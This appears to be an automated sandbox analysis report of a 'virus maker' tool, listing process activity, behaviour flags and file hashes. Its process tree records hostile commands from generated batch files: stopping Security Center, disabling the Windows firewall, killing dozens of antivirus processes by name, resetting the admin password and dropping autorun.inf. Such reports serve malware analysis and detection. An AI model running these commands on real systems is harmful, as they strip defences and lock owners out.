C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2788 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3832 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5992 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6004 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6992 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Bhavesh Virus Maker v1.0.0.1.zip\Bhavesh Virus Maker\Bhavesh Virus Maker\bin\Debug\Bhavesh Virus Maker.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Bhavesh Virus Maker v1.0.0.1.zip\Bhavesh Virus Maker\Bhavesh Virus Maker\bin\Debug\Bhavesh Virus Maker.exe"1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\adad.bat" "1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\wannadie.bat" "1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\wannadie.bat" "1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\adad.bat" "1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\dadadaadad.bat" "1⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\net.exenet stop "Security Center"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center"3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\tskill.exetskill /A av*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A fire*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A anti*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A spy*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A bullguard2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A PersFw2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A KAV*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A ZONEALARM2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A SAFEWEB2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A OUTPOST2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A nv*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A nav*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A F-*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A ESAFE2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A cle2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A BLACKICE2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A def*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A kav2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A kav*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A avg*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A ash*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A aswupdsv2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A ewid*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A guard*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A guar*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A msmp*2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill /A mcafe*2⤵
-
C:\Windows\system32\tskill.exetskill /A mghtml2⤵
-
C:\Windows\system32\tskill.exetskill /A msiexec2⤵
-
C:\Windows\system32\tskill.exetskill /A outpost2⤵
-
C:\Windows\system32\tskill.exetskill /A isafe2⤵
-
C:\Windows\system32\tskill.exetskill /A zap*2⤵
-
C:\Windows\system32\tskill.exetskill /A zauinst2⤵
-
C:\Windows\system32\tskill.exetskill /A upd*2⤵
-
C:\Windows\system32\tskill.exetskill /A zlclien*2⤵
-
C:\Windows\system32\tskill.exetskill /A minilog2⤵
-
C:\Windows\system32\tskill.exetskill /A cc*2⤵
-
C:\Windows\system32\tskill.exetskill /A norton*2⤵
-
C:\Windows\system32\tskill.exetskill /A norton au*2⤵
-
C:\Windows\system32\tskill.exetskill /A ccc*2⤵
-
C:\Windows\system32\tskill.exetskill /A npfmn*2⤵
-
C:\Windows\system32\tskill.exetskill /A loge*2⤵
-
C:\Windows\system32\tskill.exetskill /A nisum*2⤵
-
C:\Windows\system32\tskill.exetskill /A issvc2⤵
-
C:\Windows\system32\tskill.exetskill /A tmp*2⤵
-
C:\Windows\system32\tskill.exetskill /A tmn*2⤵
-
C:\Windows\system32\tskill.exetskill /A pcc*2⤵
-
C:\Windows\system32\tskill.exetskill /A cpd*2⤵
-
C:\Windows\system32\tskill.exetskill /A pop*2⤵
-
C:\Windows\system32\tskill.exetskill /A pav*2⤵
-
C:\Windows\system32\tskill.exetskill /A padmin2⤵
-
C:\Windows\system32\tskill.exetskill /A panda*2⤵
-
C:\Windows\system32\tskill.exetskill /A avsch*2⤵
-
C:\Windows\system32\tskill.exetskill /A sche*2⤵
-
C:\Windows\system32\tskill.exetskill /A syman*2⤵
-
C:\Windows\system32\tskill.exetskill /A virus*2⤵
-
C:\Windows\system32\tskill.exetskill /A realm*2⤵
-
C:\Windows\system32\tskill.exetskill /A sweep*2⤵
-
C:\Windows\system32\tskill.exetskill /A scan*2⤵
-
C:\Windows\system32\tskill.exetskill /A ad-*2⤵
-
C:\Windows\system32\tskill.exetskill /A safe*2⤵
-
C:\Windows\system32\tskill.exetskill /A avas*2⤵
-
C:\Windows\system32\tskill.exetskill /A norm*2⤵
-
C:\Windows\system32\tskill.exetskill /A offg*2⤵
-
C:\Windows\regedit.exe"regedit.exe" "C:\Users\Admin\Desktop\nokeyboard.reg"1⤵
- Runs .reg file with regedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\dadadaadad.bat" "1⤵
- Drops autorun.inf file
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\net.exenet stop "Security Center"2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center"3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\tskill.exetskill /A av*2⤵
-
C:\Windows\system32\tskill.exetskill /A fire*2⤵
-
C:\Windows\system32\tskill.exetskill /A anti*2⤵
-
C:\Windows\system32\tskill.exetskill /A spy*2⤵
-
C:\Windows\system32\tskill.exetskill /A bullguard2⤵
-
C:\Windows\system32\tskill.exetskill /A PersFw2⤵
-
C:\Windows\system32\tskill.exetskill /A KAV*2⤵
-
C:\Windows\system32\tskill.exetskill /A ZONEALARM2⤵
-
C:\Windows\system32\tskill.exetskill /A SAFEWEB2⤵
-
C:\Windows\system32\tskill.exetskill /A OUTPOST2⤵
-
C:\Windows\system32\tskill.exetskill /A nv*2⤵
-
C:\Windows\system32\tskill.exetskill /A nav*2⤵
-
C:\Windows\system32\tskill.exetskill /A F-*2⤵
-
C:\Windows\system32\tskill.exetskill /A ESAFE2⤵
-
C:\Windows\system32\tskill.exetskill /A cle2⤵
-
C:\Windows\system32\tskill.exetskill /A BLACKICE2⤵
-
C:\Windows\system32\tskill.exetskill /A def*2⤵
-
C:\Windows\system32\tskill.exetskill /A kav2⤵
-
C:\Windows\system32\tskill.exetskill /A kav*2⤵
-
C:\Windows\system32\tskill.exetskill /A avg*2⤵
-
C:\Windows\system32\tskill.exetskill /A ash*2⤵
-
C:\Windows\system32\tskill.exetskill /A aswupdsv2⤵
-
C:\Windows\system32\tskill.exetskill /A ewid*2⤵
-
C:\Windows\system32\tskill.exetskill /A guard*2⤵
-
C:\Windows\system32\tskill.exetskill /A guar*2⤵
-
C:\Windows\system32\tskill.exetskill /A msmp*2⤵
-
C:\Windows\system32\tskill.exetskill /A mcafe*2⤵
-
C:\Windows\system32\tskill.exetskill /A mghtml2⤵
-
C:\Windows\system32\tskill.exetskill /A msiexec2⤵
-
C:\Windows\system32\tskill.exetskill /A outpost2⤵
-
C:\Windows\system32\tskill.exetskill /A isafe2⤵
-
C:\Windows\system32\tskill.exetskill /A zap*2⤵
-
C:\Windows\system32\tskill.exetskill /A zauinst2⤵
-
C:\Windows\system32\tskill.exetskill /A upd*2⤵
-
C:\Windows\system32\tskill.exetskill /A zlclien*2⤵
-
C:\Windows\system32\tskill.exetskill /A minilog2⤵
-
C:\Windows\system32\tskill.exetskill /A cc*2⤵
-
C:\Windows\system32\tskill.exetskill /A norton*2⤵
-
C:\Windows\system32\tskill.exetskill /A norton au*2⤵
-
C:\Windows\system32\tskill.exetskill /A ccc*2⤵
-
C:\Windows\system32\tskill.exetskill /A npfmn*2⤵
-
C:\Windows\system32\tskill.exetskill /A loge*2⤵
-
C:\Windows\system32\tskill.exetskill /A nisum*2⤵
-
C:\Windows\system32\tskill.exetskill /A issvc2⤵
-
C:\Windows\system32\tskill.exetskill /A tmp*2⤵
-
C:\Windows\system32\tskill.exetskill /A tmn*2⤵
-
C:\Windows\system32\tskill.exetskill /A pcc*2⤵
-
C:\Windows\system32\tskill.exetskill /A cpd*2⤵
-
C:\Windows\system32\tskill.exetskill /A pop*2⤵
-
C:\Windows\system32\tskill.exetskill /A pav*2⤵
-
C:\Windows\system32\tskill.exetskill /A padmin2⤵
-
C:\Windows\system32\tskill.exetskill /A panda*2⤵
-
C:\Windows\system32\tskill.exetskill /A avsch*2⤵
-
C:\Windows\system32\tskill.exetskill /A sche*2⤵
-
C:\Windows\system32\tskill.exetskill /A syman*2⤵
-
C:\Windows\system32\tskill.exetskill /A virus*2⤵
-
C:\Windows\system32\tskill.exetskill /A realm*2⤵
-
C:\Windows\system32\tskill.exetskill /A sweep*2⤵
-
C:\Windows\system32\tskill.exetskill /A scan*2⤵
-
C:\Windows\system32\tskill.exetskill /A ad-*2⤵
-
C:\Windows\system32\tskill.exetskill /A safe*2⤵
-
C:\Windows\system32\tskill.exetskill /A avas*2⤵
-
C:\Windows\system32\tskill.exetskill /A norm*2⤵
-
C:\Windows\system32\tskill.exetskill /A offg*2⤵
-
C:\Windows\system32\net.exenet user Admin Bhavesh2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin Bhavesh3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\wadawda.bat" "1⤵
- Drops autorun.inf file
-
C:\Windows\system32\net.exenet user Admin Bhavesh2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin Bhavesh3⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5390187670cb1e0eb022f4f7735263e82
SHA1ea1401ccf6bf54e688a0dc9e6946eae7353b26f1
SHA2563e6c56356d6509a3fd4b2403555be55e251f4a962379b29735c1203e57230947
SHA512602f64d74096d4fb7a23b23374603246d42b17cc854835e3b2f4d464997b73f289a3b40eb690e3ee707829d4ff886865e982f72155d96be6bc00166f44878062
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD58294f1821fd3419c0a42b389d19ecfc6
SHA1cd4982751377c2904a1d3c58e801fa013ea27533
SHA25692a96c9309023c8b9e1396ff41f7d9d3ff8a3687972e76b9ebd70b04e3bf223a
SHA512372d369f7ad1b0e07200d3aa6b2cfce5beafa7a97f63932d4c9b3b01a0e8b7eb39881867f87ded55a9973abea973b2d2c9b6fc4892f81cec644702b9edb1566d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5aa68cb7aea86360b71565d3cae820920
SHA1fabb5c5f715d563926f3e69ca22f29aa881b4c71
SHA2569fadb67b57246fe12fae3cbf3267fd65234ce87e8296092c1eeb75530bd59bbb
SHA51262c834d24bd6684baac28853fea82ab24e41ebeae684dd3a844238011e60f34254315b57d1d23830755cbbc3b9b24bbbfa11edb4d2c8b43c82942235d32e23b6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
4KB
MD59ef52af052523722bc088028607846a3
SHA19cb24c2b16916a6d7fe4ad29cb71f78bd88442fa
SHA256568024800387683d97728fa2448aa6a73ee8f89bfb53474f7cfbea7a75807d30
SHA512d9beb32cf86302f80f841fc4010417d921dc8c6e286fa3b9efc7b53c14d9d73a63c5ef829b92fe874ed0b599f9027691ffbd14ecd0ffbcea582462ac280d56db
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD53637b765af8e63d2babd875fb107b762
SHA1149240299d606066d16ad82f3624506422aa41df
SHA25660c103008b1c04ab1bae11775f7a7f812a7e76dd0b6618a81306539e3771b98b
SHA51225ec835922b2f51e61e59390f387a25f58d710ff63d692d40469fdf8048237c6ed74c4f3375dc45c0ab35e0d8f73b7d22c0799b8ae4fcbe05f0b37033b69e537
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
8KB
MD59f58e8b5d8693ba7698f3bbc01e88a07
SHA1f01ade8bd03f0b4c9ded8c3de556b4c6da4f7c1a
SHA2561b4a83cbce485217003d2b951e41a4b25d5903fa541f71e78c062a5947ed9c06
SHA512c54ccf5babafd3059990a8537d74369b0ef2980c116c32332b86829312f737a2c303e4b0f2a0df226ec3a7fefc3ae645d6d901d8ed46357ddb111bd531a76f6e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
8KB
MD56a3c4d1c3d481ea8952e05e1d7651421
SHA117d11aba90144d82c9a2683e1b1fdf0754c90147
SHA2567b655456785cbb3dd9b0b7f4257fd6d70b5814aa6ba38331d2c8692cbcda48f2
SHA5129a27c61a5aaecd1f958416359b70fe80d64e8ead810c3fead543078d06e7aa5640f766bfee18cb90274f8d98ab5e4c40d44c8851331fa7374019fe12782b9e79
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5176cfcd399a1449aec5a585e58bd0de7
SHA1d03f4cfb63b8b2c7a97c790886dc3d966a35d847
SHA2564e810b49b9d27313f9523bef6b0d7264b808de8d243a249c996f73177a28cb81
SHA512918560d9e7da7eb2db3651b524a7f89721934b3c94024844d36de431ff03024fd8d852ade9c48f94da79af0f6e29454007d8aef39fdec85e3026a8269c4cd8ca
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD53f8ec36bc5e25bf2b2b29404b72d0a3d
SHA1a1339c624da6c1f6cebe3be8d555ec91e0acef76
SHA25660f1e91e503886930fc1f6b68d0ff78beaac286b1f400e1896ccb7380bb0a021
SHA51296ce28d58d522964d553ad0df01652b8ef9051e024ecf5ac28fa7780ac57cfe89ff866a36d9880c03097946561e6f556c27f59d8325091124917b982d8920c9a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD51712fc1fa4521a4306de6feba62a18b5
SHA1ce2bbf7c5685a101187ee5dd0546ee686f8b8915
SHA256d67d661af824b45a68df108005adc9e1ceb8919cd27072c415277a659b141e42
SHA512237e586419c6109317b92378a6b128556a0ccbcdd79de2e4b1f4a28f249126b98d08bc8952062ad02bb86e3477f4afae5f8d494c76b7264192de7327a5fc7b08
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.datFilesize
11KB
MD5cd56e155edf53e5728c46b6c9eb9c413
SHA114b1b0f090803c9ee39797aed4af13dc7849566d
SHA25670a6cf268c013fb4d907bedc12af3e5f802f179f0cc8353c7b8227dde840d31a
